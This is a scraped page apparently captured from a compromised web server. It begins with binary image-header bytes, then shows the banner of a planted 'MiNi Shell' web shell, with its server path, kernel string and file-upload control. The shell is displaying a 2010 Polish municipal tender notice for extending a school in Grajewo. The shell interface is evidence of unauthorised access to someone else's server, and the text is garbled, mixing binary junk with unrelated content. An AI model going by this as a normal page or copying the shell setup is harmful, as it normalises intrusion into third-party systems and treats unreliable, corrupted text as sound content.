JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101112/320965-N-2010.html

<p class="kh_header"><b>Grajewo: Przebudowa i rozbudowa części budynku Szkoły Podstawowej nr 2 w Grajewie na potrzeby edukacji przedszkolnej</b><br>
<b>Numer ogłoszenia: 320965 - 2010; data zamieszczenia: 12.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Grajewo , ul. Strażacka 6, 19-200 Grajewo, woj. podlaskie, tel. 086 2723235, faks 086 2723238.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grajewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i rozbudowa części budynku Szkoły Podstawowej nr 2 w Grajewie na potrzeby edukacji przedszkolnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa i rozbudowa części budynku Szkoły Podstawowej nr 2 w Grajewie na potrzeby edukacji przedszkolnej polega na rozbudowie budynku Szkoły Podstawowej nr 2 o II-kondygnacyjne skrzydło o powierzchni zabudowy 156,9 m2 w miejscu istniejącego tarasu po wschodniej stronie budynku szkoły.
Inwestycja będzie realizowana przy dofinansowaniu ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007-2013.Przedmiot zamówienia opisuje projekt budowlany oraz specyfikacja techniczna wykonania i odbioru robót, opracowana przez jednostkę projektową: Archetyp Rafał Zdanowicz z siedzibą 15-007 Białystok, ul. Towarowa 10A.
1. Dobudowane skrzydło ma zawierać następujący program użytkowy zgodnie z ww projektem budowlanym:
Poziom przyziemia:
1. Wiatrołap 		8,7 m2
2. Szatnia 		25,3 m2
3. Szatnia 		25,3 m2
4. Magazyn 		26,0 m2
5. Pom. gospodarcze 	4,0 m2
6. Komunikacja 	29,0 m2
Poziom parteru:
1. Sala 		121,2 m2
2. Klatka schodowa 	12,5 m2
3. Łazienka 		9,4 m2
Razem kondygnacje: 	261,4 m2

2. Realizacja inwestycji polega na wykonaniu następujących elementów robót:

Roboty rozbiórkowe istniejącego tarasu z altaną wraz z wywozem gruzu i materiałów rozbiórkowych na miejsce wskazane przez zamawiającego na odległość do 2km.

Wykonanie elementów konstrukcyjnych budynku zgodnie z projektem budowlanym:
- Ściany fundamentowe - posadowione na ławach żelbetowych murowane z bloczków betonowych.
- Ściany zewnętrzne trójwarstwowe: warstwa konstrukcyjna z pustaków ceramicznych gr. 25cm, na zaprawie cementowo-wapiennej, warstwa izolacyjna styropian gr.15cm (w ścianach oddzielenia ppoż. izolacja z wełny mineralnej); warstwa osłonowa z pustaków ceramicznych gr. 12 cm na zaprawie cementowo-wapiennej.
- Ściany wewnętrzne konstrukcyjne - wykonane z pustaków ceramicznych grubości 25 cm, na zaprawie cementowo-wapiennej.
- Strop nad przyziemiem - żelbetowy, wylewany gr. 18cm.
- Stropodach nad parterem - dźwigary z belek stalowych typu HEA220, dźwigary oparte i kotwione do żelbetowych wieńców dachowych. Ze względu na wymagania ppoż. między dźwigarami wylewane płyty żelbetowe. Dźwigary od spodu owinięte siatką i otynkowane wraz z płytami żelbetowym tynkiem cementowo-wapiennym.
- Dach o spadku dwustronnym o nachyleniu 4 stopni kryty blachą powlekaną o profilu trapezowym T50x0.75mm opartą na płatwiach z zetowników stalowych giętych.
- Schody wewnętrzne i zewnętrzne żelbetowe wylewane. Balustrada schodów wewnętrznych z profili stalowych, na wys. ca 110 cm nad stopniami; pochwyt d= 40mm, elementy stalowe malowane farbą antykorozyjną. Balustrada schodów zewnętrznych z profili stalowych na wys. ca 110 cm nad stopniami i spocznikami; pochwyt d= 40mm, wypełnienie balustrady z elementów pionowych o prześwitach pomiędzy elementami nie większymi niż 10 cm; elementy stalowe malowane farbą antykorozyjną.
- W poziomie przyziemia przebicie otworu drzwiowego łączącego istniejący budynek z nowobudowanym. 

Izolacje termiczne:
- Ocieplenie ścian zewnętrznych: styropian EPS 70 gr. 15cm (w odległości do 4m od ściany istniejącego budynku zastosować wełnę mineralną ze względu na wymagania ppoż.)
- Ocieplenie posadzki na gruncie: styropian EPS 100 gr. 10 cm.
- Ocieplenie dachu: wełna skalna gr. w sumie 26 cm.

Wykończenie wewnętrzne w budynku
Sala zespołu przedszkolnego: ściany tynkowane tynkiem cementowo-wapiennym i malowane farbami emulsyjnymi łatwozmywalnymi, przy umywalce ściana obłożona płytkami ceramicznymi na wys. 2m i na szerokość po 0,5 m od umywalki, podłoga pod umywalką wyłożona płytkami ceramicznymi antypoślizgowymi powyżej R11 na powierzchni ok. 2 m2; podłoga sali wyłożona wykładziną dywanową z atestem umożliwiającym stosowanie w przedszkolach. Wysokość sali w świetle wykończonych podłogi i sufitu powinna być wyższa niż 300 cm i mieścić się w zakresie 301 do 305 cm.
Łazienka: okładzina ścian z płytek ceramicznych do wysokości 2m; powyżej tynk cementowo-wapienny lub gipsowy malowany farbami emulsyjnymi; posadzka: terakota na izolacji przeciwwilgociowej. Ścianki działowe między kabinami jako systemowe z płyt laminowanych.
Pozostałe pomieszczenia (szatnie, magazynek, pom. gospodarcze, korytarz i klatka schodowa): ściany tynkowane tynkiem cementowo-wapiennym i malowane farbami emulsyjnymi łatwozmywalnymi; podłogi wyłożone płytkami ceramicznymi o współczynniku antypoślizgowości powyżej R11, na ścianach cokoliki wyłożone płytkami ceramicznymi na wys. ok. 10cm.
Sufity:
Pomieszczenia kondygnacji przyziemia: tynk cementowo-wapienny malowany na biało.
Pomieszczenia kondygnacji parteru: sufit podwieszany systemowy w kasetonach 60x60 cm; sufity na tragarzach stalowych niewidocznych, typ rusztu ukryty.

Kolory wykończenia wnętrza przed wykonaniem należy uzgodnić z zarządzającym Szkołą Podstawową nr 2.

W przypadku robót prowadzonych w istniejącym budynku szkoły wymurowane ściany otynkować, bruzdy i otwory naprawić i malować farbami emulsyjnymi w kolorach dopasowanych do istniejącego wykończenia, podłogi naprawić; doprowadzić do stanu zbliżonego sprzed rozpoczęcia robót.

Wykończenie zewnętrzne:
- Ściany poziomu kondygnacji przyziemia - tynk mozaikowy zewnętrzny w kolorze niebiesko-szarym.
- Ściany poziomu kondygnacji parteru - tynk malowany farbami elewacyjnymi w kolorze ceglastym.
- Gzymsy - prefabrykowane malowane w kolorze niebieskim.
Uwaga. Barwy wykończenia zewnętrznego należy dobrać do kolorystyki istniejącego obiektu szkoły podstawowej, tak by odtworzyć ją jak najwierniej.
- Schody zewnętrzne wykończone płytkami gresowymi mrozoodpornymi o współczynniku antypoślizgowości powyżej R11 układane na kleju mrozoodpornym.
- Pokrycie dachu - blacha o profilu trapezowym, powlekana w kolorze brązowym.
- Obróbki blacharskie dachu, parapety - blacha stalowa powlekana w kolorze brązowym.
- Rynny, rury spustowe - systemowe z PCV lub blachy powlekanej, w kolorze brązowym.
- Daszek nad wejściem: wykonany indywidualnie lub prefabrykowany, o min. wymiarach: wysięg 120 cm, szerokość 160 cm, o konstrukcji metalowej w kolorze brązowym z wypełnieniem z poliwęglanu.
- Wykonanie opaski betonowej lub z kostki brukowej o szer. 50cm wokół budowanego skrzydła.

Stolarka okienna i drzwiowa
- Drzwi zewnętrzne wejściowe DZ1 - dwuskrzydłowe z profili aluminiowych ciepłych, szklone szkłem bezpiecznym, szyby zespolone o maksymalnym współczynniku przenikania ciepła U=1,1 W/m2K, wyposażone w dwa zamki i samozamykacz, w kolorze brązowym.
- Drzwi D2a, D3 i D4a - drzwi oddzielenia pożarowego o odporności ogniowej EI60, wyposażone w zamek (z wyłączeniem D2a).
- Drzwi D1 i ścianka O3 - z profili PCV w kolorze brązowym, szyby bezpieczne, wyposażone w samozamykacz.
- Drzwi DZ2 - z profili PCV w kolorze białym, szyby bezpieczne zespolone o maksymalnym współczynniku przenikania ciepła U=1,1 W/m2K, wyposażone w zamek i samozamykacz.
- Drzwi D2 - drzwi płytowe, gładkie, wyposażone w zamek i otwór wentylacyjny, rozwierane na szerokość 180o.
- Drzwi D4 - drzwi dwuskrzydłowe, płytowe, gładkie, wyposażone w zamek i samozamykacz.
- Okna z profili PCV w kolorze białym, szyby zespolone o maksymalnym współczynniku przenikania ciepła U=1,1 W/m2K,.
Dostęp osób niepełnosprawnych
Osoby niepełnosprawne będą dostawać się do budowanego skrzydła z istniejącego obiektu szkoły, który wyposażony jest w odpowiednie pochylnie i windę. Przejścia pomiędzy skrzydłami istniejącym i nowobudowanym powinny być wykonane bezprogowo i bez różnicy poziomów. Również wewnętrzne otwory drzwiowe nie mogą posiadać progów. 

Wykonawca powinien odtworzyć istniejące nawierzchnie utwardzone, które będzie zmuszony rozebrać w czasie prowadzonych przez siebie robót.

Roboty będą prowadzone na obiekcie będącym w użytkowaniu. Roboty należy prowadzić w sposób powodujący jak najmniejszą uciążliwość dla pracujących szkół

W ramach robót sanitarnych mają być wykonane zgodnie z projektem budowlanym:
- instalacje centralnego ogrzewania;
- instalacje wody zimnej, ciepłej oraz kanalizacji sanitarnej (w tym: umywalki 3 szt. zamontowane w sposób umożliwiający korzystanie przez dzieci w wieku przedszkolnym, miski sedesowe ze spłuczką: 2 szt. przeznaczone do użytkowania przez dzieci w wieku przedszkolnym oraz kabina prysznicowa z brodzikiem; temperatura ciepłej wody doprowadzonej do urządzeń sanitarnych powinna wynosić od 35 do 40°C poprzez zastosowanie termostatycznego zaworu mieszającego);
- instalacja p-pożarowa składająca się z dwóch hydrantów wewnętrznych DN25 z wężem półsztywnym umieszczonych w szafkach podtynkowych (po jednym na każdej kondygnacji) oraz z dwóch gaśnic podręcznych o ładunku 4 kg;
- instalacja wentylacji w sali przedszkolnej: mechaniczna nawiewno-wywiewna z odzyskiem ciepła oraz wstępnym podgrzaniem powietrza wtłaczanego.

W ramach robót elektrycznych mają być wykonane zgodnie z projektem budowlanym:
- instalacja oświetleniowa;
- instalacja gniazd wtykowych 230 V;
- instalacja komputerowa i telefoniczna;
- instalacja oświetlenia awaryjnego ewakuacyjnego;
- wyłącznik p-pożarowy odcinający zasilanie prądem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.41.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10 000 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zrealizowanie zgodnie z zasadami sztuki budowlanej i prawidłowe ukończenie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamówień na roboty budowlane polegające na wykonaniu budynków wraz z instalacjami wewnętrznymi, każdy o kubaturze co najmniej 750 m3.
Spełnienie ww warunku oceniane będzie w oparciu o informacje zawarte w przedłożonych w ofercie dokumentach wymienionych w Rozdz. IX SIWZ i zostanie dokonane wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W kierowaniu robotami budowlanymi mogą uczestniczyć osoby, które posiadają doświadczenie, kwalifikacje zawodowe i wykształcenie niezbędne do wykonania zamówienia. Należy podać informację o podstawie dysponowania tymi osobami. 
Osoby proponowane do pełnienia funkcji kierownika budowy i kierownika robót powinni posiadać odpowiednie uprawnienia budowlane, aktualne na okres wykonywania robót zaświadczenie o przynależności do właściwej izby samorządu zawodowego w specjalnościach:
1) konstrukcyjno-budowlanej;
2) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
3) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Dodatkowo kierownik budowy powinien posiadać min. 2 lata doświadczenia na stanowisku kierownika budowy. 
Spełnienie ww warunku oceniane będzie w oparciu o informacje zawarte w przedłożonych w ofercie dokumentach wymienionych w Rozdz. IX SIWZ i zostanie dokonane wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie ubezpieczenia cywilnego z tytułu prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę min. 500 000zł (słownie: pięćset tysięcy złotych)
Spełnienie ww warunku oceniane będzie w oparciu o informacje zawarte w przedłożonych w ofercie dokumentach wymienionych w Rozdz. IX SIWZ i zostanie dokonane wg formuły spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy o zamówienie ubiega się Wykonawca występujący jako konsorcjum,       zobowiązany jest on do przedłożenia wraz z ofertą pełnomocnictwa w celu ustalenia  podmiotu uprawnionego do występowania w imieniu grupy Wykonawców. Z ww   pełnomocnictwa winno wynikać:
a) jakie podmioty tworzą konsorcjum,
b) wskazanie podmiotu uprawnionego do występowania w imieniu Wykonawców z podaniem zakresu jego umocowania,
c) określenie celu wspólnych działań jako: złożenie wspólnej oferty oraz zrealizowanie przedmiotu niniejszego zamówienia,
c)wskazanie zakresu obowiązków i działań każdego z uczestników konsorcjum (z podaniem % udziału w realizacji zamówienia),
d)oznaczenie czasu trwania konsorcjum ( na okres nie krótszy niż okres realizacji przedmiotu zamówienia i okres gwarancji rękojmi ),</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany obowiązującej stawki VAT Zamawiający dopuszcza możliwość zmiany umowy w zakresie ceny o kwotę wynikającą ze zmienionej stawki tego podatku.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:bip.um.grajewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Grajewo
19-200 Grajewo ul.Strażacka 6A pok. nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2010 godzina 12:15, miejsce: Urząd Miasta Grajewo
19-200 Grajewo ul.Strażacka 6A pok. nr 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




